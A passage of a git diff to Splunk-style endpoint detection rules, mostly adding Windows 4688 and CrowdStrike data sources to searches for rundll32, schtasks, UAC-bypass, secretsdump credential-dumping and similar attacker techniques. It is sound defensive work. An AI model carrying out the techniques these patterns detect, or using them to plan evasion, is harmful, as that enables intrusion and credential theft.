@@ -15,6 +15,8 @@ description: The following analytic detects the execution of the runas.exe proce
   target host.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_runas` AND Processes.process
   = "*/user:*" AND Processes.process = "*admin*" by Processes.dest Processes.user
diff --git a/detections/endpoint/rundll32_control_rundll_hunt.yml b/detections/endpoint/rundll32_control_rundll_hunt.yml
index 48b89e8052..2415080e37 100644
--- a/detections/endpoint/rundll32_control_rundll_hunt.yml
+++ b/detections/endpoint/rundll32_control_rundll_hunt.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies instances of rundll32.exe executi
   persistence within the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*Control_RunDLL*  by
   Processes.dest Processes.user Processes.parent_process_name Processes.process_name
diff --git a/detections/endpoint/rundll32_control_rundll_world_writable_directory.yml b/detections/endpoint/rundll32_control_rundll_world_writable_directory.yml
index 553eb513a4..951b4f5ea3 100644
--- a/detections/endpoint/rundll32_control_rundll_world_writable_directory.yml
+++ b/detections/endpoint/rundll32_control_rundll_world_writable_directory.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of rundll32.exe with t
   escalation, or persistent access within the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*Control_RunDLL*
   AND Processes.process IN ("*\\appdata\\*", "*\\windows\\temp\\*", "*\\programdata\\*")  by
diff --git a/detections/endpoint/rundll32_lockworkstation.yml b/detections/endpoint/rundll32_lockworkstation.yml
index 72b774ccfa..a4330ce22e 100644
--- a/detections/endpoint/rundll32_lockworkstation.yml
+++ b/detections/endpoint/rundll32_lockworkstation.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of the rundll32.exe co
   could indicate an attempt to evade detection and hinder incident response efforts.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name=rundll32.exe
   Processes.process= "*user32.dll,LockWorkStation*" by Processes.dest Processes.user
diff --git a/detections/endpoint/rundll32_shimcache_flush.yml b/detections/endpoint/rundll32_shimcache_flush.yml
index b942853036..205e9c912e 100644
--- a/detections/endpoint/rundll32_shimcache_flush.yml
+++ b/detections/endpoint/rundll32_shimcache_flush.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of a suspicious rundll
   to cover their tracks and maintain persistence on the compromised machine.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where  `process_rundll32` AND Processes.process
   = "*apphelp.dll,ShimFlushCache*" by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/rundll32_with_no_command_line_arguments_with_network.yml b/detections/endpoint/rundll32_with_no_command_line_arguments_with_network.yml
index 45e5287cbb..f1fe25961f 100644
--- a/detections/endpoint/rundll32_with_no_command_line_arguments_with_network.yml
+++ b/detections/endpoint/rundll32_with_no_command_line_arguments_with_network.yml
@@ -14,7 +14,7 @@ description: The following analytic detects the execution of rundll32.exe withou
   network connections, potentially leading to data exfiltration or further compromise
   of the system.
 data_source:
-- Sysmon EventID 1
+- Sysmon EventID 1 AND Sysmon EventID 3
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime FROM datamodel=Endpoint.Processes where `process_rundll32` AND Processes.action!="blocked"
   by host _time span=1h Processes.process_id Processes.process_name Processes.dest
diff --git a/detections/endpoint/rundll_loading_dll_by_ordinal.yml b/detections/endpoint/rundll_loading_dll_by_ordinal.yml
index 0bb925c509..d74d961b49 100644
--- a/detections/endpoint/rundll_loading_dll_by_ordinal.yml
+++ b/detections/endpoint/rundll_loading_dll_by_ordinal.yml
@@ -14,6 +14,8 @@ description: The following analytic detects rundll32.exe loading a DLL export fu
   privilege escalation, or persistent access within the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` values(Processes.process) as process
   min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
   where `process_rundll32` by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/ryuk_wake_on_lan_command.yml b/detections/endpoint/ryuk_wake_on_lan_command.yml
index 9128468dea..5b33f29853 100644
--- a/detections/endpoint/ryuk_wake_on_lan_command.yml
+++ b/detections/endpoint/ryuk_wake_on_lan_command.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of Wake-on-LAN commands asso
   investigation of the affected endpoints are crucial to mitigate the impact.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process="*8 LAN*"
   OR Processes.process="*9 REP*") by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/sc_exe_manipulating_windows_services.yml b/detections/endpoint/sc_exe_manipulating_windows_services.yml
index 39f929620a..38342ca70c 100644
--- a/detections/endpoint/sc_exe_manipulating_windows_services.yml
+++ b/detections/endpoint/sc_exe_manipulating_windows_services.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the creation or modification of Wind
   a severe threat to the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` values(Processes.process) as process
   min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
   where Processes.process_name = sc.exe (Processes.process="* create *" OR Processes.process="*
diff --git a/detections/endpoint/scheduled_task_creation_on_remote_endpoint_using_at.yml b/detections/endpoint/scheduled_task_creation_on_remote_endpoint_using_at.yml
index 837dcae27a..37493db23d 100644
--- a/detections/endpoint/scheduled_task_creation_on_remote_endpoint_using_at.yml
+++ b/detections/endpoint/scheduled_task_creation_on_remote_endpoint_using_at.yml
@@ -15,6 +15,8 @@ description: 'The following analytic detects the creation of scheduled tasks on
   or further compromise of the network.'
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=at.exe
   OR Processes.original_file_name=at.exe) (Processes.process=*\\\\*) by Processes.dest
diff --git a/detections/endpoint/scheduled_task_deleted_or_created_via_cmd.yml b/detections/endpoint/scheduled_task_deleted_or_created_via_cmd.yml
index 3087f52f73..15d073384e 100644
--- a/detections/endpoint/scheduled_task_deleted_or_created_via_cmd.yml
+++ b/detections/endpoint/scheduled_task_deleted_or_created_via_cmd.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the creation or deletion of sched
   within the environment, posing a significant security risk.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count values(Processes.process)
   as process values(Processes.parent_process) as parent_process min(_time) as firstTime
   max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=schtasks.exe
diff --git a/detections/endpoint/scheduled_task_initiation_on_remote_endpoint.yml b/detections/endpoint/scheduled_task_initiation_on_remote_endpoint.yml
index c0991f8e37..f33cbf68fa 100644
--- a/detections/endpoint/scheduled_task_initiation_on_remote_endpoint.yml
+++ b/detections/endpoint/scheduled_task_initiation_on_remote_endpoint.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the use of 'schtasks.exe' to start a
   leading to further compromise of the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=schtasks.exe
   OR Processes.original_file_name=schtasks.exe) (Processes.process= "* /S *" AND Processes.process=*/run*)
diff --git a/detections/endpoint/schtasks_run_task_on_demand.yml b/detections/endpoint/schtasks_run_task_on_demand.yml
index e9f9b1188b..cb789f9f01 100644
--- a/detections/endpoint/schtasks_run_task_on_demand.yml
+++ b/detections/endpoint/schtasks_run_task_on_demand.yml
@@ -16,6 +16,8 @@ description: The following analytic detects the execution of a Windows Scheduled
   compromise.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` values(Processes.process) as process
   values(Processes.process_id) as process_id count min(_time) as firstTime max(_time)
   as lastTime  from datamodel=Endpoint.Processes where Processes.process_name = "schtasks.exe"
diff --git a/detections/endpoint/schtasks_scheduling_job_on_remote_system.yml b/detections/endpoint/schtasks_scheduling_job_on_remote_system.yml
index 0a0b4544cb..9e3e1f57cd 100644
--- a/detections/endpoint/schtasks_scheduling_job_on_remote_system.yml
+++ b/detections/endpoint/schtasks_scheduling_job_on_remote_system.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of 'schtasks.exe' to create
   risk.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name = schtasks.exe
   OR Processes.original_file_name=schtasks.exe) (Processes.process="*/create*" AND
diff --git a/detections/endpoint/schtasks_used_for_forcing_a_reboot.yml b/detections/endpoint/schtasks_used_for_forcing_a_reboot.yml
index 37ac72a0f1..d1920c9677 100644
--- a/detections/endpoint/schtasks_used_for_forcing_a_reboot.yml
+++ b/detections/endpoint/schtasks_used_for_forcing_a_reboot.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of 'schtasks.exe' to schedul
   detection.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` values(Processes.process) as process
   min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
   where Processes.process_name=schtasks.exe Processes.process="*shutdown*" Processes.process="*/create
diff --git a/detections/endpoint/screensaver_event_trigger_execution.yml b/detections/endpoint/screensaver_event_trigger_execution.yml
index 78ba213d36..2def2d3f72 100644
--- a/detections/endpoint/screensaver_event_trigger_execution.yml
+++ b/detections/endpoint/screensaver_event_trigger_execution.yml
@@ -14,7 +14,7 @@ description: The following analytic detects modifications to the SCRNSAVE.EXE re
   attacker to execute arbitrary code with elevated privileges, leading to further
   system compromise and persistent access.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count  min(_time) as firstTime
   max(_time) as lastTime FROM datamodel=Endpoint.Registry where (Registry.registry_path="*\\Control
diff --git a/detections/endpoint/script_execution_via_wmi.yml b/detections/endpoint/script_execution_via_wmi.yml
index d8f42a5cb9..7fc4cc0b69 100644
--- a/detections/endpoint/script_execution_via_wmi.yml
+++ b/detections/endpoint/script_execution_via_wmi.yml
@@ -9,6 +9,8 @@ description: |-
   The following analytic detects the execution of scripts via Windows Management Instrumentation (WMI) by monitoring the process 'scrcons.exe'. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events. WMI-based script execution is significant because adversaries often use it to perform malicious activities stealthily, such as system compromise, data exfiltration, or establishing persistence. If confirmed malicious, this activity could allow attackers to execute arbitrary code, escalate privileges, or maintain long-term access to the environment. Analysts should differentiate between legitimate administrative use and potential threats.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name=scrcons.exe
   by Processes.dest Processes.user Processes.parent_process Processes.process_name
diff --git a/detections/endpoint/sdclt_uac_bypass.yml b/detections/endpoint/sdclt_uac_bypass.yml
index 47ee1614ca..01964f6054 100644
--- a/detections/endpoint/sdclt_uac_bypass.yml
+++ b/detections/endpoint/sdclt_uac_bypass.yml
@@ -15,6 +15,8 @@ description: The following analytic detects suspicious modifications to the sdcl
   severe security risk.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 - Sysmon EventID 12
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count min(_time) AS firstTime max(_time)
diff --git a/detections/endpoint/sdelete_application_execution.yml b/detections/endpoint/sdelete_application_execution.yml
index 69e6542438..9cdfa0fa42 100644
--- a/detections/endpoint/sdelete_application_execution.yml
+++ b/detections/endpoint/sdelete_application_execution.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of the sdelete.exe app
   response and investigation efforts.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` values(Processes.process) as process
   values(Processes.parent_process) as parent_process values(Processes.process_id)
   as process_id count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
diff --git a/detections/endpoint/searchprotocolhost_with_no_command_line_with_network.yml b/detections/endpoint/searchprotocolhost_with_no_command_line_with_network.yml
index 653159cc35..7b62a8a795 100644
--- a/detections/endpoint/searchprotocolhost_with_no_command_line_with_network.yml
+++ b/detections/endpoint/searchprotocolhost_with_no_command_line_with_network.yml
@@ -14,7 +14,7 @@ description: The following analytic detects instances of searchprotocolhost.exe
   this activity could allow attackers to establish network connections for command
   and control, potentially leading to data exfiltration or further system compromise.
 data_source:
-- Sysmon EventID 1
+- Sysmon EventID 1 AND Sysmon EventID 3
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
   where Processes.process_name=searchprotocolhost.exe by _time span=1h  Processes.process_id
   Processes.process_name Processes.dest Processes.process_path Processes.process Processes.parent_process_name
diff --git a/detections/endpoint/secretdumps_offline_ntds_dumping_tool.yml b/detections/endpoint/secretdumps_offline_ntds_dumping_tool.yml
index 45c91d0cb8..2ab87de25b 100644
--- a/detections/endpoint/secretdumps_offline_ntds_dumping_tool.yml
+++ b/detections/endpoint/secretdumps_offline_ntds_dumping_tool.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the potential use of the secretsdump
   further lateral movement and potential privilege escalation within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "python*.exe"
   Processes.process = "*.py*" Processes.process = "*-ntds*" (Processes.process = "*-system*"
diff --git a/detections/endpoint/serviceprincipalnames_discovery_with_setspn.yml b/detections/endpoint/serviceprincipalnames_discovery_with_setspn.yml
index d16327f89d..780b947022 100644
--- a/detections/endpoint/serviceprincipalnames_discovery_with_setspn.yml
+++ b/detections/endpoint/serviceprincipalnames_discovery_with_setspn.yml
@@ -14,6 +14,8 @@ description: 'The following analytic detects the use of `setspn.exe` to query th
   the environment, posing a significant security risk.'
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_setspn` (Processes.process="*-t*"
   AND Processes.process="*-f*") OR (Processes.process="*-q*" AND Processes.process="**/**")
diff --git a/detections/endpoint/services_escalate_exe.yml b/detections/endpoint/services_escalate_exe.yml
index df20d5640f..5ff12df1af 100644
--- a/detections/endpoint/services_escalate_exe.yml
+++ b/detections/endpoint/services_escalate_exe.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of a randomly named
   within the network, posing a severe threat to the organization's security.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=services.exe
   Processes.process_path=*admin$* by Processes.process_path Processes.dest Processes.user
diff --git a/detections/endpoint/services_lolbas_execution_process_spawn.yml b/detections/endpoint/services_lolbas_execution_process_spawn.yml
index 93510c2490..e1402493f6 100644
--- a/detections/endpoint/services_lolbas_execution_process_spawn.yml
+++ b/detections/endpoint/services_lolbas_execution_process_spawn.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies `services.exe` spawning a LOLBAS
   within the environment, posing a severe security risk.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name=services.exe)
   (Processes.process_name IN ("Regsvcs.exe", "Ftp.exe", "OfflineScannerShell.exe",
diff --git a/detections/endpoint/set_default_powershell_execution_policy_to_unrestricted_or_bypass.yml b/detections/endpoint/set_default_powershell_execution_policy_to_unrestricted_or_bypass.yml
index 84526a6eb9..3b96b3f5bd 100644
--- a/detections/endpoint/set_default_powershell_execution_policy_to_unrestricted_or_bypass.yml
+++ b/detections/endpoint/set_default_powershell_execution_policy_to_unrestricted_or_bypass.yml
@@ -14,6 +14,8 @@ description: The following analytic detects changes to the PowerShell ExecutionP
   to further compromise of the system and potential escalation of privileges.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 - Sysmon EventID 12
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count min(_time) AS firstTime max(_time)
diff --git a/detections/endpoint/shim_database_installation_with_suspicious_parameters.yml b/detections/endpoint/shim_database_installation_with_suspicious_parameters.yml
index d23095f980..44ae46e3bf 100644
--- a/detections/endpoint/shim_database_installation_with_suspicious_parameters.yml
+++ b/detections/endpoint/shim_database_installation_with_suspicious_parameters.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of sdbinst.exe with pa
   to the compromised system.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` values(Processes.process) as process
   min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
   where Processes.process_name = sdbinst.exe by Processes.process_name Processes.parent_process_name
diff --git a/detections/endpoint/silentcleanup_uac_bypass.yml b/detections/endpoint/silentcleanup_uac_bypass.yml
index 06dd984ad7..8aca5c188e 100644
--- a/detections/endpoint/silentcleanup_uac_bypass.yml
+++ b/detections/endpoint/silentcleanup_uac_bypass.yml
@@ -15,6 +15,8 @@ description: The following analytic detects suspicious modifications to the regi
   and persistence.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 - Sysmon EventID 12
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count min(_time) AS firstTime max(_time)
diff --git a/detections/endpoint/single_letter_process_on_endpoint.yml b/detections/endpoint/single_letter_process_on_endpoint.yml
index 9f4b91fe89..bf6039c9e6 100644
--- a/detections/endpoint/single_letter_process_on_endpoint.yml
+++ b/detections/endpoint/single_letter_process_on_endpoint.yml
@@ -9,6 +9,8 @@ description: |-
   The following analytic detects processes with names consisting of a single letter, which is often indicative of malware or an attacker attempting to evade detection. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant because attackers use such techniques to obscure their presence and carry out malicious activities like data theft or ransomware attacks. If confirmed malicious, this behavior could lead to unauthorized access, data exfiltration, or system compromise. Immediate investigation is required to determine the legitimacy of the process.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes by Processes.dest, Processes.user,
   Processes.process, Processes.process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(lastTime)`
diff --git a/detections/endpoint/slui_runas_elevated.yml b/detections/endpoint/slui_runas_elevated.yml
index 4e1704c562..9067232703 100644
--- a/detections/endpoint/slui_runas_elevated.yml
+++ b/detections/endpoint/slui_runas_elevated.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of the Microsoft Softw
   system changes, data exfiltration, or further compromise of the affected endpoint.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name=slui.exe
   (Processes.process=*-verb* Processes.process=*runas*) by Processes.dest Processes.user
diff --git a/detections/endpoint/slui_spawning_a_process.yml b/detections/endpoint/slui_spawning_a_process.yml
index 0f60018064..8ae1396e04 100644
--- a/detections/endpoint/slui_spawning_a_process.yml
+++ b/detections/endpoint/slui_spawning_a_process.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the Microsoft Software Licensing Use
   compromising the system's security and gaining unauthorized access.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=slui.exe
   by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process
diff --git a/detections/endpoint/spoolsv_spawning_rundll32.yml b/detections/endpoint/spoolsv_spawning_rundll32.yml
index a368a4bb44..3fb7053870 100644
--- a/detections/endpoint/spoolsv_spawning_rundll32.yml
+++ b/detections/endpoint/spoolsv_spawning_rundll32.yml
@@ -16,6 +16,8 @@ description: The following analytic detects the spawning of `rundll32.exe` witho
   endpoint.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=spoolsv.exe
   `process_rundll32` by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/spoolsv_writing_a_dll.yml b/detections/endpoint/spoolsv_writing_a_dll.yml
index 72a318e110..476e83b162 100644
--- a/detections/endpoint/spoolsv_writing_a_dll.yml
+++ b/detections/endpoint/spoolsv_writing_a_dll.yml
@@ -15,6 +15,8 @@ description: The following analytic detects `spoolsv.exe` writing a `.dll` file,
   system compromise. Immediate endpoint isolation and further investigation are recommended.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 - Sysmon EventID 11
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
   where Processes.process_name=spoolsv.exe by _time Processes.process_guid Processes.process_name
diff --git a/detections/endpoint/spoolsv_writing_a_dll___sysmon.yml b/detections/endpoint/spoolsv_writing_a_dll___sysmon.yml
index 66efe10da1..e65673de82 100644
--- a/detections/endpoint/spoolsv_writing_a_dll___sysmon.yml
+++ b/detections/endpoint/spoolsv_writing_a_dll___sysmon.yml
@@ -7,7 +7,7 @@ status: production
 type: TTP
 description: The following analytic detects `spoolsv.exe` writing a `.dll` file, which
   is unusual behavior and may indicate exploitation of vulnerabilities like CVE-2021-34527
-  (PrintNightmare). This detection leverages Sysmon Event ID 11 to monitor file creation
+  (PrintNightmare). This detection leverages Sysmon EventID 11 to monitor file creation
   events in the `\spool\drivers\x64\` directory. This activity is significant because
   `spoolsv.exe` typically does not write DLL files, and such behavior could signify
   an ongoing attack. If confirmed malicious, this could allow an attacker to execute
diff --git a/detections/endpoint/sunburst_correlation_dll_and_network_event.yml b/detections/endpoint/sunburst_correlation_dll_and_network_event.yml
index d52b748e83..227e15f570 100644
--- a/detections/endpoint/sunburst_correlation_dll_and_network_event.yml
+++ b/detections/endpoint/sunburst_correlation_dll_and_network_event.yml
@@ -7,7 +7,7 @@ status: experimental
 type: TTP
 description: The following analytic identifies the loading of the malicious SolarWinds.Orion.Core.BusinessLayer.dll
   by SolarWinds.BusinessLayerHost.exe and subsequent DNS queries to avsvmcloud.com.
-  It uses Sysmon Event ID 7 for DLL loading and Event ID 22 for DNS queries, correlating
+  It uses Sysmon EventID 7 for DLL loading and Event ID 22 for DNS queries, correlating
   these events within a 12-14 day period. This activity is significant as it indicates
   potential Sunburst malware infection, a known supply chain attack. If confirmed
   malicious, this could lead to unauthorized network access, data exfiltration, and
diff --git a/detections/endpoint/suspicious_copy_on_system32.yml b/detections/endpoint/suspicious_copy_on_system32.yml
index bb76235f6b..0bf17e0415 100644
--- a/detections/endpoint/suspicious_copy_on_system32.yml
+++ b/detections/endpoint/suspicious_copy_on_system32.yml
@@ -15,6 +15,8 @@ description: The following analytic detects suspicious file copy operations from
   within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name
   IN("cmd.exe", "powershell*","pwsh.exe", "sqlps.exe", "sqltoolsps.exe", "powershell_ise.exe")
diff --git a/detections/endpoint/suspicious_curl_network_connection.yml b/detections/endpoint/suspicious_curl_network_connection.yml
index f4a1e56f14..bb7ade140e 100644
--- a/detections/endpoint/suspicious_curl_network_connection.yml
+++ b/detections/endpoint/suspicious_curl_network_connection.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of the curl command contacti
   to maintain control over the compromised system and deploy additional payloads.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name=curl
   Processes.process=s3.amazonaws.com by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/suspicious_dllhost_no_command_line_arguments.yml b/detections/endpoint/suspicious_dllhost_no_command_line_arguments.yml
index e3b117d33e..b8135a973c 100644
--- a/detections/endpoint/suspicious_dllhost_no_command_line_arguments.yml
+++ b/detections/endpoint/suspicious_dllhost_no_command_line_arguments.yml
@@ -15,6 +15,8 @@ description: The following analytic detects instances of DLLHost.exe executing w
   dumping or file manipulation, posing a severe threat to the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
   where `process_dllhost` by _time span=1h  Processes.process_id Processes.process_name
   Processes.dest Processes.user Processes.process_path Processes.process Processes.parent_process_name
diff --git a/detections/endpoint/suspicious_gpupdate_no_command_line_arguments.yml b/detections/endpoint/suspicious_gpupdate_no_command_line_arguments.yml
index 577c14d002..e65674f175 100644
--- a/detections/endpoint/suspicious_gpupdate_no_command_line_arguments.yml
+++ b/detections/endpoint/suspicious_gpupdate_no_command_line_arguments.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of gpupdate.exe withou
   or lateral movement within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
   where `process_gpupdate` by _time span=1h  Processes.process_id Processes.process_name
   Processes.dest Processes.user Processes.process_path Processes.process Processes.parent_process_name
diff --git a/detections/endpoint/suspicious_icedid_rundll32_cmdline.yml b/detections/endpoint/suspicious_icedid_rundll32_cmdline.yml
index 0623f65c76..2d5cb01f68 100644
--- a/detections/endpoint/suspicious_icedid_rundll32_cmdline.yml
+++ b/detections/endpoint/suspicious_icedid_rundll32_cmdline.yml
@@ -14,6 +14,8 @@ description: The following analytic detects a suspicious `rundll32.exe` command
   to further system compromise and potential data exfiltration.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*/i:*
   by  Processes.process_name Processes.process Processes.parent_process_name Processes.parent_process
diff --git a/detections/endpoint/suspicious_image_creation_in_appdata_folder.yml b/detections/endpoint/suspicious_image_creation_in_appdata_folder.yml
index efed22edca..fe52632afb 100644
--- a/detections/endpoint/suspicious_image_creation_in_appdata_folder.yml
+++ b/detections/endpoint/suspicious_image_creation_in_appdata_folder.yml
@@ -14,8 +14,7 @@ description: The following analytic detects the creation of image files in the A
   malicious, this activity could indicate unauthorized data capture and exfiltration,
   compromising sensitive information and user privacy.
 data_source:
-- Sysmon EventID 1
-- Sysmon EventID 11
+- Sysmon EventID 1 AND Sysmon EventID 11
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
   where Processes.process_name=*.exe Processes.process_path="*\\appdata\\Roaming\\*"
   by _time span=1h Processes.process_id Processes.process_name Processes.process Processes.dest
diff --git a/detections/endpoint/suspicious_linux_discovery_commands.yml b/detections/endpoint/suspicious_linux_discovery_commands.yml
index b1d9d22a6d..c71814a399 100644
--- a/detections/endpoint/suspicious_linux_discovery_commands.yml
+++ b/detections/endpoint/suspicious_linux_discovery_commands.yml
@@ -15,6 +15,8 @@ description: 'The following analytic detects the execution of suspicious bash co
   a severe threat to the environment.'
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count values(Processes.process)
